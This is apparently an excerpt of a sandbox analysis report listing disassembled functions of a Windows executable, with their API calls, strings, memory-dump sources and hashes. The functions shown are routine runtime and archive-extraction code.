                Function 004FBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 004FBF28
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FBF3A
                • _free.LIBCMT ref: 004FBF4C
                • _free.LIBCMT ref: 004FBF5E
                • _free.LIBCMT ref: 004FBF70
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 0e2f52b312ab111c160776317d79d187c0aa1d36efa0d2a8952bf72737df1ac7
                • Instruction ID: 4f5a51ee4e713577342487d41ddf4541dc59c1667663f0184ebd5488d6beae1a
                • Opcode Fuzzy Hash: 0e2f52b312ab111c160776317d79d187c0aa1d36efa0d2a8952bf72737df1ac7
                • Instruction Fuzzy Hash: F7F0FF33504209B7C620EB65EE86C2B73D9FA157147744C0EF609DBA10DB28FC859AA8
                Function 004F76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\j0GOUGjcJD.exe,00000104), ref: 004F76FD
                • _free.LIBCMT ref: 004F77C8
                • _free.LIBCMT ref: 004F77D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\j0GOUGjcJD.exe
                • API String ID: 2506810119-2358271240
                • Opcode ID: 1b9fc1fdd17385afb8fff81c76efce671f24afcfce3e224d75de4d786721b403
                • Instruction ID: 474f8af98484eb9043b94b399d6c616221a9a9dd1ae037d2fb91f60cd4e9ca5d
                • Opcode Fuzzy Hash: 1b9fc1fdd17385afb8fff81c76efce671f24afcfce3e224d75de4d786721b403
                • Instruction Fuzzy Hash: DC31B171A0421CAFDB21EF9ADC81DBEBBECEB94310B14406BE60497310D6785E41DB99
                Function 004D7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D7579
                  • Part of subcall function 004D3B3D: __EH_prolog.LIBCMT ref: 004D3B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004D7640
                  • Part of subcall function 004D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004D7C04
                  • Part of subcall function 004D7BF5: GetLastError.KERNEL32 ref: 004D7C4A
                  • Part of subcall function 004D7BF5: CloseHandle.KERNEL32(?), ref: 004D7C59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: 88c7e258929ea77f8a9cf485d149d925203cc992cc005b2e4d16935dcc86c9ce
                • Instruction ID: 756e208a894e375bbe3e214f7186c6dc1b18c93460c6e57b61e3d2630dc909ca
                • Opcode Fuzzy Hash: 88c7e258929ea77f8a9cf485d149d925203cc992cc005b2e4d16935dcc86c9ce
                • Instruction Fuzzy Hash: 2F31D771908248AEDF10EB66DC55BEE7B68AF14358F00405FF444A7392E7B88A48C765
                Function 004EA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EA4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004EA4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 004EA4E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 2e77367b154e94f01d57943e695d302d2a2594388e05ba41c8b41788367462fd
                • Instruction ID: ab86aed97b964c84bd8c8b8a5599929f6023d68fd25333fa638e574cc55383df
                • Opcode Fuzzy Hash: 2e77367b154e94f01d57943e695d302d2a2594388e05ba41c8b41788367462fd
                • Instruction Fuzzy Hash: 1311E432204380BFD6219F599D0CF267769EB56301F000017F2009A3E0C7A9AD29E72B
                Function 004DD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: c77809ba28eeeffcd7fb470f5937ff4e1cf63e5dcc6c701188a36d2f05c8b0d4
                • Instruction ID: 27ec641af717419cc8fec1f0ad7b4f860d5601af96e1cc82cccd7ed3646f78a9
                • Opcode Fuzzy Hash: c77809ba28eeeffcd7fb470f5937ff4e1cf63e5dcc6c701188a36d2f05c8b0d4
                • Instruction Fuzzy Hash: 1121813284024CAADF20DEA4CC56FEE7BACEF04300F140567FA1596291D379DA55DB55
                Function 004DB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                APIs
                • _swprintf.LIBCMT ref: 004DB51E
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • _wcschr.LIBVCRUNTIME ref: 004DB53C
                • _wcschr.LIBVCRUNTIME ref: 004DB54C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: e87fc5f876c58095e09be9c16d582dc75ced96ac6f8a301365775b9f905738e8
                • Instruction ID: 78bc87b59e180c2af95157441558a369f9ce1e91e3a9f6d872de048e25392acc
                • Opcode Fuzzy Hash: e87fc5f876c58095e09be9c16d582dc75ced96ac6f8a301365775b9f905738e8
                • Instruction Fuzzy Hash: E9014E63900311F6C7206B76ACA2C3BB7ACDE953A4741440BF945C6281FB38D450C2E9
                Function 004E06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E06F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E06FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E070D
                Strings
                • Thread pool initialization failed., xrefs: 004E0725
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: ae750121dda91dcf3c421b256ebae84c51460d740a632ef21a42d3e534abc7a1
                • Instruction ID: 1d70f12258140487a8a2ceef3dfd4da74557cad132c8b586d7e32bed55b81be8
                • Opcode Fuzzy Hash: ae750121dda91dcf3c421b256ebae84c51460d740a632ef21a42d3e534abc7a1
                • Instruction Fuzzy Hash: 4511A3B1501709AFD3205F76C888AABFBECEB95745F10482FF1DA82200D6B56980CB54
                Function 004ED38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: b680c822b3886c3a9803a2150a788376fab890530935a4759803d67879b0048f
                • Instruction ID: 055cb7b23701fbda792a0298ab36a1ea416ffff57dc230e9ca77a66699bd0da7
                • Opcode Fuzzy Hash: b680c822b3886c3a9803a2150a788376fab890530935a4759803d67879b0048f
                • Instruction Fuzzy Hash: 8E01F9719002856FCB215F16ED44AA63FA9F728385F004422F801D2370CBB49C58FB65
                Function 004F91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction ID: 88b0b066211758727178d0ef3f3b5cec00eb32ecc584e9be92eb7c0418d0d887
                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction Fuzzy Hash: 28A1673190438A9FDB25CE19C8917BEBBE4EF65314F1445AFEA849B381C23C8C42C759
                Function 004DA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,004D80B7,?,?,?), ref: 004DA351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,004D80B7,?,?), ref: 004DA395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,004D80B7,?,?,?,?,?,?,?,?), ref: 004DA416
                • CloseHandle.KERNEL32(?,?,00000000,?,004D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 004DA41D
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 0838771ec80eff99e26a6ff1f463a302b0bf7ab6e1b6483c71cec4cfe66dd9cf
                • Instruction ID: ccc2a210c1628ac12acba8d4bb34a9d88cc87e76f95016afcaa5d5860c22655b
                • Opcode Fuzzy Hash: 0838771ec80eff99e26a6ff1f463a302b0bf7ab6e1b6483c71cec4cfe66dd9cf
                • Instruction Fuzzy Hash: 9341F0302483809AD731DF65CC65BAFBBE9AB81304F04091FB9D0933C0C7A89A58DB57
                Function 004FC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004F89AD,?,00000000,?,00000001,?,?,00000001,004F89AD,?), ref: 004FC0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004FC16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004F67E2,?), ref: 004FC181
                • __freea.LIBCMT ref: 004FC18A
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: 99274464cb2808cec39df6eecfe55e741b40e182ba82fda61fa275f3aac1e225
                • Instruction ID: 1c2176b07b2906d2c9d64c99b48605707fa49b34e183dc3a49b690909a39cb6d
                • Opcode Fuzzy Hash: 99274464cb2808cec39df6eecfe55e741b40e182ba82fda61fa275f3aac1e225
                • Instruction Fuzzy Hash: 3031F272A0010EABDB248F65DD81DBF7BA5EB44310F14012AFD04D7291E739CD65CBA4
                Function 004E9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 004E9DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004E9DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E9DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 004E9DE9
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: e8abff34d42590ae76d401ee1b943e056a7eebfc9c3ea3f9284b45ee5c677065
                • Instruction ID: 61db78ccd39bb052e9f00afcc4e739df45bbe59092fd3a09c00c5d352530254b
                • Opcode Fuzzy Hash: e8abff34d42590ae76d401ee1b943e056a7eebfc9c3ea3f9284b45ee5c677065
                • Instruction Fuzzy Hash: 22E0EC31989A22A7D7241BA5BC0DBDB3B55AB29713F054005F605962D0DAB4444DEBA4
                Function 004F2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004F2016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004F201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004F2020
                  • Part of subcall function 004F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004F311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004F2035
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: 93056af8f9849b3c1fd8ea9dd2b7f5660ac3efe2511328e76f2a6fda035df150
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: 97C0022600565DA81C113EB363021BF07404862BCEB9220CBAB80172439E8E0A0AA03F
                Function 004E9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004E9DF1: GetDC.USER32(00000000), ref: 004E9DF5
                  • Part of subcall function 004E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E9E00
                  • Part of subcall function 004E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 004E9E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 004E9F8D
                  • Part of subcall function 004EA1E5: GetDC.USER32(00000000), ref: 004EA1EE
                  • Part of subcall function 004EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 004EA21D
                  • Part of subcall function 004EA1E5: ReleaseDC.USER32(00000000,?), ref: 004EA2B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: 6deee80773b63a15da845eb4724e4ac52fb3741e5c8668b97dd50ea43a09f022
                • Instruction ID: 1302301602d751ef20fd06e36e86e5397c6aee18b44f2d9370b164bb8d41121d
                • Opcode Fuzzy Hash: 6deee80773b63a15da845eb4724e4ac52fb3741e5c8668b97dd50ea43a09f022
                • Instruction Fuzzy Hash: 3A812375208345AFC714DF29C84492EBBE9FF98705F00492EF98AD7260DB35AD09DB52
                Function 004E0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 6e03efb66b1523dff74e6f9851d096c92114c44587767568e648780f621b3df9
                • Instruction ID: 6de9274ac12c7a9494c1b8569b1dcdf4f192fedf3def75f188f22769c44988f1
                • Opcode Fuzzy Hash: 6e03efb66b1523dff74e6f9851d096c92114c44587767568e648780f621b3df9
                • Instruction Fuzzy Hash: 4351B53168C7C0F9EA211A9A8C52F367665AB04B07F244917F3EB748E1C6FD54E1660F
                Function 004D772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D7730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D78CC
                  • Part of subcall function 004DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA458
                  • Part of subcall function 004DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA489
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
